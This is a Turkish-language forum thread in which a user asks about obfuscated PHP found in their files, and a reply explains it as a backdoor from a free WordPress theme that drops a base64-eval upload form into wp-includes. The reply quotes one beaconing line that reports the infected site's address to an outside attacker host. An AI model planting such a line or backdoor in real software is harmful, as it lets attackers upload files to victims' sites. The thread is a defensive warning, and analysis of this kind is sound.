bu php kodu nedir ne anlama geliyor

merhaba arkadaşlar ben kod yazıyordum dosyaların için bunu buldum ne anlama geliyor bu kod neyindir biri bana söylesin sanki şifreleme gibi bişey ama çözemedim






Şifrelenmiş php kodu ama çözülebilir tabi QOOO0000 fonksiyonunu da bulup yazar mısınız?

muhtemelen bi lisans mekanizması yada bi shell'dir.

tahminimce telif satırı ile ilgili bir kod, bu kısım dosya karakter sayısı olabilir : $Illl=120015;

Global. Kodlar obfuscate edilmiş. Karıştırılmış.
Karışık kodları düzelttikten sonra, muhtemelen ard arda tekrar eden belirli karakterleri silince gerçek şifrelenmiş olay ortaya çıkar. İşte ondan sonra nasıl şifrelendiğini bulup çözersin.

Resimde kırmızı çerçeve içine aldığım kod ile uzaktaki bir txt dosyasının içindeki kodların sitenize uygulanması mümkün kılınmış. Şöyle ki bu linkteki adrese girdiğimiz zaman şöyle bir sonuç ile karşılaşıyoruz:

Php bilen arkadaşlar daha iyi bileceklerdir ki bu dosyanın içindeki kodlar ile "/wp-includes/SimplePie/" dizininin içine theme-options.php isimli bir dosya oluşturulmakta ve bu dosyanın içinide "val(base64_decode" şeklinde başlayan kodlar yerleştirilmektedir. Bu kodu decode edip incelediğimiz zaman bir tür upload formu ile karşılaşıyoruz, oda şu şekildedir:

Gördüğünüz upload formunu oluşturup bu form sayesinde sitenize istedikleri zararlı dosyayı yüklemeleri, sadece bu bahsi geçen siteden tema indirip onu aktif etmenize bakıyor. Bu kadar basite indirgenmiş bir sistem oluşturulmuş. Peki bunlar benim siteme onlardan indirdiğim temayı kurduğumu nasıl bielceklerde bana zarar verebilecekler diye düşünebilirsiniz. Oda şu şekilde mümkün kılınmış:

@file_get_contents("http://yakaladimsizi.com/panel/l.php?a=http://".$_SERVER['SERVER_NAME']);

Satırı sayesinde sitenizde oluşturulmuş olan formun linki bu insanların panelinde görünebiliyor, ve bugun kim temamızı indirip tuzağa düşmüş diye kontrol edebiliyorlar.

Geçmiş olsun, ücretsiz tema indirip kullanmayın ...

valla doğru bir tema vardı deneyeyim dedim demekki ondan buşalmış sileyim hemen :(